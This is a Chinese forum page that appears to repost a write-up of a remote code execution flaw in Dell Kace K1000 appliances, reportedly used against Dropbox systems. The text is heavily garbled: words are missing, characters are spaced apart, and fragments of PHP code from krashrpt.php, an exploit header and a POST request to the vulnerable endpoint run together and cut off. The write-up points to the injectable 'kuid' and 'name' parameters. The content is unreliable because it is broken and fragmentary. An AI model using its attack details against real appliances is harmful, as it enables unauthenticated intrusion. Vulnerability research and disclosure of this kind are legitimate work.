搜索

[14065] 2019-05-04_利用DellKaceK1000的RCE漏洞接管Dropbox所有客户管理系统

文档创建者:s7ckTeam
浏览次数:31
最后更新:2025-01-18
2019-05-04_利用DellKaceK1000的RCE漏洞接管Dropbox所有客户管理系统 D e l l   K a c e   K 1 0 0 0   R C E D r o p b o x c l o u d s   F r e e B u f   2 0 1 9 - 0 5 - 0 4 w r i t e u p D e l l   K a c e   K 1 0 0 0 R C E 2 0 1 8 9 H a c k e r O n e D r o p b o x H 1 - 3 1 2 0 H 1 - 3 1 2 0 M V H   D e l l   K a c e   K 1 0 0 0   v 6 . 4 . 1 2 0 7 5 6 e s c a p e s h e l l a r g B y p a s s K 1 0 0 0 D r o p b o x K 1 0 0 0   v 6 . 3 D r o p b o x R C E D e l l K 1 - 1 8 6 5 2 K 1 - 1 8 6 5 2 e s c a p e s h e l l a r g   s h e l l   使 e s c a p e s h e l l a r g   (   s t r i n g   $ a r g   )   :   s t r i n g $ a r g   s h e l l   P H P   -   e s c a p e s h e l l a r g H 1 - 3 1 2 0 D r o p b o x D e l l   K a c e   K 1 0 0 0   D e l l   K a c e   K 1 0 0 0 D e l l Q u e s t   S o f t w a r e   I n c Q u e s t K a c e   K 1 0 0 0 v 9 . 0 . 2 7 0 D r o p b o x
D r o p b o x K a c e   K 1 0 0 0 v 6 . 3 . 1 1 3 3 9 7 K a c e   K 1 0 0 0 Q u e s t K a c e   K 1 0 0 0 v 6 K a c e   K 1 0 0 0 Q u e s t Q u e s t v 9 v 6 K a c e   K 1 0 0 0   v 9 K a c e   K 1 0 0 0   v 9   -   / s e r v i c e / k r a s h r p t . p h p 访 K 1 - 1 8 6 5 2 b a s e n a m e ( ) k u i d     n a m e $ v a l u e s G E T P O S T   k u i d     n a m e z i p K 1 - 1 8 6 5 2 b a s e n a m e $ t m p D i r     $ z i p F n e s c a p e s h e l l a r g   e s c a p e s h e l l a r g   $ k u i d     $ n a m e   -   ' k u i d '   n a m e D e l l   K a c e   K 1 0 0 0   v 9 使 D e l l   K a c e   K 1 0 0 0   v 9 e s c a p e s h e l l a r g   e s c a p e s h e l l a r g D e l l K a c e   K 1 0 0 0   v 6 v 6 e s c a p e s h e l l a r g   R C E e x p l o i t e x p l o i t P O S T e x p l o i t P O S T D e l l   K a c e   K 1 0 0 0   v 6 l i n u x i d R C E D r o p b o x 使 D e l l   K a c e   K 1 0 0 0   v 6 . 3 D r o p b o x H 1 - 3 1 2 0 M V H   Q u e s t     Q u e s t   D e l l Q u e s t D e l l   K a c e   K 1 0 0 0   v   6 . 4 6 . 4 . 1 2 0 8 2 2 D e l l D r o p b o x * r c e s e c u r i t y c l o u d s F r e e B u f . C O M X - D e l l K A C E - A p p l i a n c e :   k 1 0 0 0 X - D e l l K A C E - H o s t :   r e d a c t e d . c o m X - D e l l K A C E - V e r s i o n :   6 . 3 . 1 1 3 3 9 7 X - K B O X - W e b S e r v e r :   r e d a c t e d . c o m X - K B O X - V e r s i o n :   6 . 3 . 1 1 3 3 9 7 t r y   {         / /   K 1 - 1 8 6 5 2   m a k e   s u r e   w e   e s c a p e   n a m e s   s o   w e   d o n ' t   g e t   e x t r a   p a t h   c h a r a c t e r s   t o   d o   p a t h   t r a v e r s a l         $ k u i d   =   b a s e n a m e ( $ v a l u e s [ ' k u i d ' ] ) ;         $ n a m e   =   b a s e n a m e ( $ v a l u e s [ ' n a m e ' ] ) ; }   c a t c h (   E x c e p t i o n   $ e   )   {         K B L o g (   " M i s s i n g   U R L   p a r a m :   "   .   $ e - > g e t M e s s a g e ( )   ) ;         e x i t ( ) ; } $ t m p F n B a s e   =   " k r a s h _ { $ n a m e } _ { $ k u i d } " ; $ t m p D i r   =   t e m p n a m (   K B _ U P L O A D _ D I R ,   $ t m p F n B a s e   ) ; u n l i n k (   $ t m p D i r   ) ; $ z i p F n   =   $ t m p D i r   .   " . z i p " ; / /   u n z i p   t h e   a r c h i v e   t o   a   t m p D i r ,   a n d   d e l e t e   t h e   . z i p   f i l e / /   K 1 - 1 8 6 5 2   E s c a p e   t h e   s h e l l   a r g u m e n t s   t o   a v o i d   r e m o t e   e x e c u t i o n   f r o m   i n p u t s e x e c (   " / u s r / l o c a l / b i n / u n z i p   - d   "   .   e s c a p e s h e l l a r g ( $ t m p D i r )   .   # ! / u s r / b i n / p y t h o n #   E x p l o i t   T i t l e :   D e l l   K A C E   S y s t e m s   M a n a g e m e n t   A p p l i a n c e   ( K 1 0 0 0 )   < =   6 . 4 . 1 2 0 7 5 6   U n a u t h e n t i c a t e d   R C E #   V e r s i o n :               < =   6 . 4 . 1 2 0 7 5 6 #   D a t e :                     2 0 1 9 - 0 4 - 0 9 #   A u t h o r :                 J u l i e n   A h r e n s   ( P O S T   / s e r v i c e / k r a s h r p t . p h p   H T T P / 1 . 1 H o s t :   r e d a c t e d . c o m U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 6 0 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 6 0 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 ,

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理